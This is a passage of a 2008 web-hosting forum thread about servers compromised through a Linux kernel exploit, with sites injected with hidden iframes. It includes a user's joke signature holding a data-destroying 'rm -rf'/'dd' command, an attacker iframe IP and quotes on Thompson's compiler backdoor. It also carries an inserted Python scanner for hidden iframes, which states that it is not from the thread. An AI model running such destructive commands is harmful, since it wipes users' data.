#51
02-11-2008, 03:07 PM
calum
Swamp Croc
Join Date: Jun 2007
Location: Aberdeen, Scotland
Posts: 326
Re: Hacked servers / 0 day exploit everyone read!!

Quote:
Originally Posted by kmaw View Post
I wasn't able to find anything on the web about it at the time of Brent's post... most here after the fact seemed to be after his as well...
You can find some information from this search:

http://www.google.com/search?aq=f&co...it&btnG=Search

But it is mainly just reports of it and how to carry it out

#52
02-12-2008, 11:53 AM
DarkSorrow
Swamp Croc
Join Date: Nov 2005
Location: Reeds Springs, Missouri
Posts: 250

Quote:
Originally Posted by GatorNate View Post
The second kernel is exploitable, which one is running?

uname -a

The 2nd one is just a game server box I have up. It's been up for about 4 years. It doesn't have cpanel or anything installed web wise.

http://70.84.191.146/stats/
__________________
sudo rm -rf /mnt/win32 ; sync ; dd if=/dev/random of=/mnt/win32/ooops bs=16384 ; sync
"Knowledge is Power, power corrupts, corruption is illegal. STOP LEARNING BEFORE YOU END UP IN JAIL!"

#53
02-12-2008, 03:14 PM
trd79
Hatchling Croc
Join Date: Feb 2007
Posts: 2

Earlier today I got an e-mail from Google (as a user of their webmaster tools)

"We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com."

Looking at my site now, everything seems as normal. Was this as a result of Hostgator being hacked?

#54
02-12-2008, 11:00 PM
mack
HostGator Guest
Posts: n/a

Quote:
Originally Posted by El Hombre View Post
Well I lost pretty much everything here.

I can't use google cache to upload index pages.

I also can't believe that I am unlucky enough that HG managed to back up the hacked pages on 99% of my sites.

I now have lots of white blank pages where my sites used to be.
One site back to normal and one site with an index page and the rest of the links are broken.

Was this really a problem with other hosting companies or "another HG exclusive"?

I have tried finding threads on other hosting forums but unless I am looking in the wrong place then it seems it was only here. According to some news items I have seen it's not the first time HG has been compromised like this.

I really don't think it's good enough to just say, "we got hacked, we screwed up the backup, now it's your problem so fix it yourself"

Well that's my feeling for what it's worth.

Try http://www.archive.org/

#55
02-13-2008, 11:08 PM
Nullivex
Hatchling Croc
Join Date: Sep 2005
Location: Colorado US
Posts: 1

Yes, Google probably blacklisted your page as a result of the hacker content to protect searchers. If you contact them they will resolve it in 1-2 days.

#56
02-20-2008, 04:39 PM
mach
Hatchling Croc
Join Date: Feb 2008
Posts: 4

Quote:
Originally Posted by trd79 View Post
Earlier today I got an e-mail from Google (as a user of their webmaster tools)

"We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com."

Looking at my site now, everything seems as normal. Was this as a result of Hostgator being hacked?
Check your index page for some javascript inserted at the bottom.

I found a script that inserted an invisible iframe in my page.

The IP is currently down, but it could be what triggered Google's warning. It set off Kaspersky, that's the only reason I noticed it.

Last edited by mach; 02-21-2008 at 08:56 PM. Reason: remove script
Reply With Quote
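
A defensive check for what post #56 describes (script appended at the bottom of an index page that inserts an invisible iframe), added here as an example; it is not code from the thread or from HostGator. The sample page, the 203.0.113.7 test address and every function name are constructed for illustration, and the heuristics go slightly beyond the one case in the post by also flagging zero-size or CSS-hidden iframes in static markup.

```python
import re
from html.parser import HTMLParser

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
SCRIPTED_IFRAME = re.compile(r"<\s*iframe", re.I)  # iframe markup inside a script
# Constructed sample page: one legitimate embed, then content appended after </html>.
SAMPLE = """<html><body>
<h1>My site</h1>
<iframe src="http://video.example.org/embed/1" width="560" height="315"></iframe>
</body></html>
<script>
document.write('<iframe src="http://203.0.113.7/x" width=0 height=0></iframe>');
</script>
<iframe src="http://203.0.113.7/y" style="visibility: hidden"></iframe>
"""

def _is_tiny(value):
    """True for a width/height of 0 or 1 pixel ('0', '1', '1px')."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= 1

class InjectionScanner(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []       # (line number, reason)
        self.after_body = False  # True once </body> or </html> has been seen
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        line = self.getpos()[0]
        hidden = (_is_tiny(a.get("width")) or _is_tiny(a.get("height"))
                  or HIDDEN_STYLE.search(a.get("style", "")))
        if tag == "iframe" and hidden:
            self.findings.append((line, "hidden iframe -> " + a.get("src", "?")))
        if tag in ("script", "iframe") and self.after_body:
            self.findings.append((line, "<%s> after closing </body>/</html>" % tag))
        self.in_script = self.in_script or tag == "script"

    def handle_endtag(self, tag):
        if tag in ("body", "html"):
            self.after_body = True
        elif tag == "script":
            self.in_script = False

    def handle_data(self, data):
        m = SCRIPTED_IFRAME.search(data) if self.in_script else None
        if m:  # report the line of the match, not the line of the <script> tag
            line = self.getpos()[0] + data.count("\n", 0, m.start())
            self.findings.append((line, "script writes an <iframe>"))

def scan_html(text):
    scanner = InjectionScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings

if __name__ == "__main__":
    for line, reason in scan_html(SAMPLE):
        print("line %d: %s" % (line, reason))
```

Run it against a downloaded copy of each page and compare any finding with a known-good backup; a hit is a lead to inspect, not proof of compromise.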
#57
02-20-2008, 05:22 PM
gtgeorge
Emperor Croc
Join Date: Mar 2005
Posts: 2,223

Yes the code you included in your post set off Avast with the forum post reply email that came in with:
Quote:
<iframe> tag found, it may be dangerous


Sender: HostGator Peer Support Forums - wesley@hostgator.com
Recipient: me@gmail.com
Subject: Reply to thread 'Hacked servers / 0 day exploit everyone read!!'

***
Target of remote iframe:
(You can permit them using "Permitted URLs" button)
201.235.235.174
__________________
best regards,
George

#58
02-21-2008, 10:07 AM
Sam
Emperor Croc
Join Date: Jan 2007
Location: /bin/false
Posts: 3,057

Quote:
Originally Posted by gtgeorge View Post
Yes the code you included in your post set off Avast with the forum post reply email that came in with:
.....

#59
02-21-2008, 01:34 PM
mach
Hatchling Croc
Join Date: Feb 2008
Posts: 4

Quote:
Originally Posted by gtgeorge View Post
Yes the code you included in your post set off Avast with the forum post reply email that came in with:
Sorry about that.

Why didn't hostgator send out an email letting people know what happened? I don't know how long that iframe was on my page.

#60
02-21-2008, 01:47 PM
gtgeorge
Emperor Croc
Join Date: Mar 2005
Posts: 2,223

Not sure why they didn't. I thought they went through and restored everyone's accounts that were affected by this other than the ones on the 1 server that was being backed up during the exploit.

You really should pull the code you have pasted above, it's not good to hand out malicious code on public forums.
__________________
best regards,
George

#61
02-21-2008, 02:01 PM
quietFinn
Veteran Croc
Join Date: Feb 2005
Posts: 3,475

Quote:
Originally Posted by mach View Post
Sorry about that.

Why didn't hostgator send out an email letting people know what happened? I don't know how long that iframe was on my page.
The exploit this thread is about (random js toolkit) is not the same that happened in your site.
__________________
quietFinn - netFinn Finland
"Be who you are and say what you feel because those who mind don't matter and those who matter don't mind." - Dr. Seuss

#62
02-21-2008, 02:03 PM
Sam
Emperor Croc
Join Date: Jan 2007
Location: /bin/false
Posts: 3,057

Quote:
Originally Posted by gtgeorge View Post
You really should pull the code you have pasted above, it's not good to hand out malicious code on public forums
...Or put it in code tags

#63
02-21-2008, 02:21 PM
clyde4210
HostGator Guest
Posts: n/a

Whoa I have been reading and this isn't good for HostGator. I currently use GoDaddy and their servers were not affected at all. This sort of stuff makes me think twice about using HostGator.

You can not get a current index.php using Google cache so why you're telling users they can, is beyond me. You can however get an html copy.

That doesn't help those non php scripters out any. As one person already stated they have no knowledge or a way to get copies of their old files. Yes they should have known better but, to be honest I have never had a hack issue using GoDaddy.

Either your site is secure using htaccess or it isn't. For a server to get hacked tells me that HostGator may not be the hoster I thought it was and poorly coded.

#64
02-21-2008, 02:28 PM
calum
Swamp Croc
Join Date: Jun 2007
Location: Aberdeen, Scotland
Posts: 326

Quote:
Originally Posted by clyde4210 View Post
Whoa I have been reading and this isn't good for HostGator. I currently use GoDaddy and their servers were not affected at all. This sort of stuff makes me think twice about using HostGator.

You can not get a current index.php using Google cache so why you're telling users they can, is beyond me. You can however get an html copy.

That doesn't help those non php scripters out any. As one person already stated they have no knowledge or a way to get copies of their old files. Yes they should have known better but, to be honest I have never had a hack issue using GoDaddy.

Either your site is secure using htaccess or it isn't. For a server to get hacked tells me that HostGator may not be the hoster I thought it was and poorly coded.
The security flaw affected the Linux kernel, not HostGator specifically. This could have and will have happened to other hosts, but many cover it up and also HG is so big they are targeted. It was not a problem with anything HG made, it was a problem with the Linux kernel.

#65
02-21-2008, 02:29 PM
blade32
Hatchling Croc
Join Date: Jun 2007
Posts: 35

GoDaddy hosting is awful. I'm sure this is a one off, HostGator isn't responsible.

Quote:
This is not isolated to being a hostgator problem. This is a problem for any server in the world running the latest secure kernel.

Last edited by blade32; 02-21-2008 at 02:32 PM.

#66
02-21-2008, 03:09 PM
whatrevolution
Royal Croc
Join Date: Feb 2008
Posts: 710

Quote:
Originally Posted by Goddess Dix View Post
with any hosting company, while they do backups, ultimately, you're responsible for maintaining a good backup of your site.
*COUGH* *COUGH* *COUGH*


#67
02-21-2008, 04:28 PM
Goddess Dix
King Croc
Join Date: Aug 2006
Location: KS, USA
Posts: 1,498

Quote:
Originally Posted by clyde4210 View Post
That doesn't help those non php scripters out any. As one person already stated they have no knowledge or a way to get copies of their old files. Yes they should have known better but, to be honest I have never had a hack issue using GoDaddy.
everyone is responsible for having your own copies of your site files. there is NO host who will tell you otherwise. while good hosts keep backups as well, these should be viewed as extra insurance, and not as a replacement for having access to local copies or backups.

Quote:
Either your site is secure using htaccess or it isn't. For a server to get hacked tells me that HostGator may not be the hoster I thought it was and poorly coded.
HG doesn't personally code Linux, which is an open-source operating system in use by a majority of web hosts online today. .htaccess has nothing to do with a vulnerability in a linux kernel. nor does the webhost.

while hg tends to be more open and communicative about these problems than many webhosts-which i, for one, appreciate-this vulnerability had NOTHING to do with hg or their security practices. hg does tend to get targeted because they are one of the largest and fastest growing hosts out there as mentioned earlier.

the only 100% hack-safe computer is one that is NOT connected to the internet. period.

#68
02-21-2008, 05:25 PM
whatrevolution
Royal Croc
Join Date: Feb 2008
Posts: 710

Quote:
Originally Posted by Goddess Dix View Post
HG doesn't personally code Linux, which is an open-source operating system in use by a majority of web hosts online today. .htaccess has nothing to do with a vulnerability in a linux kernel. nor does the webhost.

Search: Linux Kernel 2.6.17 exploit

#69
02-21-2008, 08:56 PM
mach
Hatchling Croc
Join Date: Feb 2008
Posts: 4

Quote:
Originally Posted by gtgeorge View Post
You really should pull the code you have pasted above, it's not good to hand out malicious code on public forums
The code isn't malicious, it's what it links to that is malicious. Since the site that it links to is down, it is completely harmless. I don't know why it set off someone's avast, the html tags should have been escaped. Anyways, I removed it.

Quote:
Originally Posted by quietFinn View Post
The exploit this thread is about (random js toolkit) is not the same that happened in your site.
Isn't this thread about the vmsplice exploit? I'm not sure what you're saying. Unless hostgator servers were recently compromised in addition to the vmsplice bug, I'm pretty sure what happened to my site is related to this thread.

#70
02-22-2008, 07:06 AM
whatrevolution
Royal Croc
Join Date: Feb 2008
Posts: 710

Quote:
Originally Posted by mach View Post
I don't know why it set off someone's avast, the html tags should have been escaped. Anyways, I removed it.

Because you needed to wrap it in bbcode tags:

HTML Code:
<p>
Like this.
<script type="text/javascript">
  document.write("Hello World!")
</script>
</p>

#71
02-22-2008, 10:29 AM
clyde4210
HostGator Guest
Posts: n/a

Yes the webhost has everything to do with Linux. Linux is made so that you can alter its code, hacks if you will. That is why Linux puts out patches and fixes.

I am on a Linux server and never had that issue using GoDaddy. My only complaint is it is taking my site 2. seconds longer to load lately. So I thought of switching. Which HostGator has the same price plan that I am on over there.

I'm not even going to go into it and a matter of fact I doubt I'll use HostGator. Just for the simple fact this site is loaded with help my sites down and basically HostGator saying we are working on it.

#72
02-22-2008, 10:33 AM
gtgeorge
Emperor Croc
Join Date: Mar 2005
Posts: 2,223

Quote:
Originally Posted by clyde4210 View Post
Yes the webhost has everything to do with Linux. Linux is made so that you can alter its code, hacks if you will. That is why Linux puts out patches and fixes.

I am on a Linux server and never had that issue using GoDaddy. My only complaint is it is taking my site 2. seconds longer to load lately. So I thought of switching. Which HostGator has the same price plan that I am on over there.

I'm not even going to go into it and a matter of fact I doubt I'll use HostGator. Just for the simple fact this site is loaded with help my sites down and basically HostGator saying we are working on it.
You are clueless on this issue then as there was no patch and was found to occur in the latest kernels. The more likely answer is that GD was running an antiquated kernel that was not affected by the exploit!
__________________
best regards,
George

#73
02-22-2008, 12:51 PM
mach
Hatchling Croc
Join Date: Feb 2008
Posts: 4

Quote:
Originally Posted by clyde4210 View Post
That is why Linux puts out patches and fixes.
Linux is an operating system. Operating systems don't write patches for themselves.

Quote:
I am on a Linux server and never had that issue using GoDaddy.
Others have: GoDaddy hosting customers victim to massive hack

#74
02-22-2008, 02:11 PM
blade32
Hatchling Croc
Join Date: Jun 2007
Posts: 35

Quote:
Originally Posted by Goddess Dix View Post
everyone is responsible for having your own copies of your site files. there is NO host who will tell you otherwise. while good hosts keep backups as well, these should be viewed as extra insurance, and not as a replacement for having access to local copies or backups.



HG doesn't personally code Linux, which is an open-source operating system in use by a majority of web hosts online today. .htaccess has nothing to do with a vulnerability in a linux kernel. nor does the webhost.

while hg tends to be more open and communicative about these problems than many webhosts-which i, for one, appreciate-this vulnerability had NOTHING to do with hg or their security practices. hg does tend to get targeted because they are one of the largest and fastest growing hosts out there as mentioned earlier.

the only 100% hack-safe computer is one that is NOT connected to the internet. period.

I'm being paranoid but a 100% safe computer is impossible!

#75
02-22-2008, 05:03 PM
whatrevolution
Royal Croc
Join Date: Feb 2008
Posts: 710

Quote:
Originally Posted by blade32 View Post
I'm being paranoid but a 100% safe computer is impossible!
Quote:
Originally Posted by clyde4210 View Post
Yes the webhost has everything to do with Linux. Linux is made so that you can alter its code, hacks if you will. That is why Linux puts out patches and fixes.
OH COME ON, Clyde...

Read a book, and stop grandstanding for the other newbs.

Quote:
The actual bug I planted in the compiler would match code in the UNIX "login" command. The replacement code would miscompile the login command so that it would accept either the intended encrypted password or a particular known password. Thus if this code were installed in binary and the binary were used to compile the login command, I could log into that system as any user.
Quote:
First we compile the modified source with the normal C compiler to produce a bugged binary. We install this binary as the official C. We can now remove the bugs from the source of the compiler and the new binary will reinsert the bugs whenever it is compiled. Of course, the login command will remain bugged with no trace in source anywhere.

All times are GMT -6. The time now is 02:33 AM.